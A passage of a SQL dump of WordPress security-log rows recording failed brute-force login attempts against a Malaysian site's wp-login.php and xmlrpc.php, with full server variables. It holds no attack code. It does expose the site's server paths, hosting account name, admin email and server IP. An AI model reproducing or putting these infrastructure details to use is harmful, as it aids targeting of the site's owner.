empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"159.89.184.25\";s:11:\"REMOTE_PORT\";s:5:\"17640\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWy8xz42Bg6xBpmAmGwCwQAAAFg\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567407303.8103\";s:12:\"REQUEST_TIME\";s:10:\"1567407303\";}}','notice','2019-09-02 06:55:05','2019-09-02 06:55:04',18204784,19504408,'https://bintara.com.my/xmlrpc.php',1,0,'159.89.184.25'),(23551,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"159.89.184.25\";s:11:\"REMOTE_PORT\";s:5:\"17212\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWy8wz42Bg6xBpmAmGwCvQAAAFQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567407299.9859\";s:12:\"REQUEST_TIME\";s:10:\"1567407299\";}}','notice','2019-09-02 06:55:01','2019-09-02 06:55:00',17685952,19177224,'https://bintara.com.my/wp-login.php',1,0,'159.89.184.25'),(23550,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"81.177.33.4\";s:11:\"REMOTE_PORT\";s:5:\"43737\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWy4@Gje8g9YegPUhtOkOQAAABE\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567406329.0067\";s:12:\"REQUEST_TIME\";s:10:\"1567406329\";}}','notice','2019-09-02 06:38:50','2019-09-02 06:38:49',18205416,19503152,'https://bintara.com.my/xmlrpc.php',1,0,'81.177.33.4'),(23534,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"192.169.139.6\";s:11:\"REMOTE_PORT\";s:5:\"53780\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWyKFFvRyrCg9V6axS3KdgAAAVE\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567394324.4293\";s:12:\"REQUEST_TIME\";s:10:\"1567394324\";}}','notice','2019-09-02 03:18:45','2019-09-02 03:18:44',18205688,19504328,'https://bintara.com.my/xmlrpc.php',1,0,'192.169.139.6'),(23535,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"185.158.212.40\";s:11:\"REMOTE_PORT\";s:5:\"45068\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWyN1TU4VuPOeWsfkg0wowAAARM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567395285.1641\";s:12:\"REQUEST_TIME\";s:10:\"1567395285\";}}','notice','2019-09-02 03:34:46','2019-09-02 03:34:45',17685376,19176824,'https://bintara.com.my/wp-login.php',1,0,'185.158.212.40'),(23536,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"185.158.212.40\";s:11:\"REMOTE_PORT\";s:5:\"45430\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWyN1zU4VuPOeWsfkg0wpQAAARU\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567395287.8875\";s:12:\"REQUEST_TIME\";s:10:\"1567395287\";}}','notice','2019-09-02 03:34:49','2019-09-02 03:34:48',18205496,19503128,'https://bintara.com.my/xmlrpc.php',1,0,'185.158.212.40'),(23537,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"62.212.132.60\";s:11:\"REMOTE_PORT\";s:5:\"51183\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWyfrz42Bg6xBpmAmGziqgAAAEc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567399855.8533\";s:12:\"REQUEST_TIME\";s:10:\"1567399855\";}}','notice','2019-09-02 04:50:57','2019-09-02 04:50:56',17686864,19178672,'https://bintara.com.my/wp-login.php',1,0,'62.212.132.60'),(23549,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"81.177.33.4\";s:11:\"REMOTE_PORT\";s:5:\"43347\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWy49j42Bg6xBpmAmGz-xAAAAEM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567406326.2361\";s:12:\"REQUEST_TIME\";s:10:\"1567406326\";}}','notice','2019-09-02 06:38:47','2019-09-02 06:38:46',17686936,19179000,'https://bintara.com.my/wp-login.php',1,0,'81.177.33.4'),(23548,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"37.187.79.30\";s:11:\"REMOTE_PORT\";s:5:\"53896\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWy1CT42Bg6xBpmAmGz7cQAAAFA\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567405321.6019\";s:12:\"REQUEST_TIME\";s:10:\"1567405321\";}}','notice','2019-09-02 06:22:02','2019-09-02 06:22:01',18205312,19504432,'https://bintara.com.my/xmlrpc.php',1,0,'37.187.79.30'),(23547,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is 